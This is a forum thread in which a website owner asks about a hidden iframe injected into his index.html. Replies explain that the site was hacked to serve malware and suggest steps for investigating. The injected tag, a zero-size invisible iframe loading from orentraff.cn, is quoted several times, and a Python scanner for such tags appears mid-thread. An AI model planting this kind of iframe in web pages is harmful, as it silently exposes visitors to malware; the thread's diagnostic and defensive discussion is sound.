index issue

ThL

Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?
2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

Many thanks in advance for your kind replies and help.
Thierry
 
Steve Pugh

Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?

orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious.
2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

You were hacked.

Steve
 
ThL

Steve Pugh wrote:
orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious.


You were hacked.

Steve

Oops...
Thanks for your quick reply Steve.

Next step :
Now what ?


Thierry
 
Jonathan N. Little

ThL said:
Steve Pugh wrote:
Oops...
Thanks for your quick reply Steve.

Next step :
Now what ?

Remove the line of code.

Contact hosting company and find out how someone else could have gotten
write access to your account.
 
ThL

Jonathan N. Little wrote:
Hi Jonathan,
Thanks for your reply.
Remove the line of code.

I erased the file and replaced it with a new index.html one.
Contact hosting company and find out how someone else could have gotten
write access to your account.
I first contacted my ISP, who host my site and asked them what the
matter was.
Unfortunately they were unable to give me any further info, apart from
the fact that the "ghost" site was registered in China.
I suppose the question of knowing "how someone got my write access" must
have come to their minds, though they didn't mention it to me.
Maybe they think I was not careful enough with my private passwords,
which could be the case. One never knows.
I'll ask them the question.

Another question just popped : Are these hacking situations common ? If
so, what do they use the hacked sites for ? Storing and exchanging
illegal data ?

Thierry
 
Harlan Messinger

ThL said:
Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?

It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen within
yours, that it's meant to do nasty things to the computer of anyone who
visits your page.
2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

Yes, someone in China hacked into your website.
 
Jonathan N. Little

ThL said:
Jonathan N. Little wrote:

Hi Jonathan,
Thanks for your reply.

I erased the file and replaced it with a new index.html one.
I first contacted my ISP, who host my site and asked them what the
matter was.
Unfortunately they were unable to give me any further info, apart from
the fact that the "ghost" site was registered in China.
I suppose the question of knowing "how someone got my write access" must
have come to their minds, though they didn't mention it to me.
Maybe they think I was not careful enough with my private passwords,
which could be the case. One never knows.
I'll ask them the question.

If this is an ISP's webspace that came with an internet connection account, well,
sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
hosting. Only time I had a hacked site was with an ISP personal
webspace. They did not restrict access for their FTP account to users
home folder (very basic security) and I even told them that once I FTPed
in I could wander all over the server... This was back in the 90's. Get
real hosting and this should not be a problem.
Another question just popped : Are these hacking situations common ? If
so, what do they use the hacked sites for ? Storing and exchanging
illegal data ?

Using your site to plant malware on unsecured browsers and gullible
visitors.

If these people who host your site don't know how your site was hacked
(and you did not tell anyone else your FTP password) I'd find a better
place to host your site. BTW, if you have not edited your page yet,
look at the modification date to give you some idea when it was hacked...
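
A way to check a local copy of a site for the kind of injected tag quoted in this thread, and to read off the modification date mentioned in the post above. This is an added example, not part of any post; the function names and the `own_hosts` parameter are assumptions, and the sample page is constructed around the iframe quoted in the thread.

```python
import os
import time
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the injected iframe quoted in the thread plus a
# normal, visible iframe that must not be reported.
SAMPLE = '''<html><body>
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->
<iframe src="http://www.example.org/map.html" width="400" height="300"></iframe>
</body></html>'''

class HiddenIframeFinder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = set(own_hosts)
        self.hits = []  # (line number, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        zero = any(a.get(d) in ("0", "0px") for d in ("width", "height"))
        hidden = zero or "display:none" in style or "visibility:hidden" in style
        host = urlparse(a.get("src", "")).hostname
        if hidden and host and host not in self.own_hosts:
            self.hits.append((self.getpos()[0], a["src"]))

def scan_html(text, own_hosts=()):
    """Return [(line, src)] for invisible iframes that load from another host."""
    finder = HiddenIframeFinder(own_hosts)
    finder.feed(text)
    return finder.hits

def scan_webroot(root, own_hosts=()):
    """Walk a local copy of the site; report path, mtime and hits per file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read(), own_hosts)
                if hits:
                    stamp = time.localtime(os.path.getmtime(path))
                    findings.append((path, time.strftime("%Y-%m-%d %H:%M", stamp), hits))
    return findings
```

The reported modification time only reflects the server's value if the copy was made with timestamps preserved; otherwise read the date from the FTP listing before replacing the file.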
 
ThL

Harlan Messinger wrote:
It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen within
yours, that it's meant to do nasty things to the computer of anyone who
visits your page.

Thanks for your reply.

Would you know how ?

Thierry
 
Harlan Messinger

ThL said:
Harlan Messinger wrote:
ThL said:
Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message.
[snip]
It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nasty things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.
 
Jonathan N. Little

Harlan said:
ThL said:
Harlan Messinger wrote:
ThL wrote:
Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message. [snip]
It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nasty things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.

As I said elsewhere in the thread, before you fix the page, check the
modification date; that can help you determine when the hack occurred.
If it was not too long ago your ISP should have the FTP session logged.
I would start there...
 
ThL

Jonathan N. Little wrote:
Harlan said:
ThL said:
Harlan Messinger wrote:
ThL wrote:
Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message. [snip]
It means your page consisted of an invisible iframe of zero width
and zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nasty things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.

As I said elsewhere in the thread, before you fix the page, check the
modification date; that can help you determine when the hack occurred.
If it was not too long ago your ISP should have the FTP session logged.
I would start there...
OK then I'll contact them and ask the question.

All this is very worrying.

Thanks a lot for your help, Jonathan, Harlan and Steve !

Thierry
 
T Lariviere

Jonathan N. Little wrote:
If this is an ISP's webspace that came with an internet connection account, well,
sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
hosting. Only time I had a hacked site was with an ISP personal
webspace. They did not restrict access for their FTP account to users
home folder (very basic security) and I even told them that once I FTPed
in I could wander all over the server... This was back in the 90's. Get
real hosting and this should not be a problem.


Using your site to plant malware on unsecured browsers and gullible
visitors.

If these people who host your site don't know how your site was hacked
(and you did not tell anyone else your FTP password) I'd find a better
place to host your site. BTW, if you have not edited your page yet,
look at the modification date to give you some idea when it was hacked...
Good to know.
Thanks.
Thierry
 
